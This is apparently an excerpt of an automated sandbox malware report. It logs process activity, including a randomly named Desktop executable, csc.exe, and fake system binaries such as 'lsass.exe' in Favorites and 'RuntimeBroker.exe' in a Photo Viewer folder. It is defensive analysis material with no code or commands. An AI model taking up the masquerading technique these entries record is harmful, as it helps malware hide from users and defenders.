                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exeProcess information set: NOOPENFILEERRORBOX
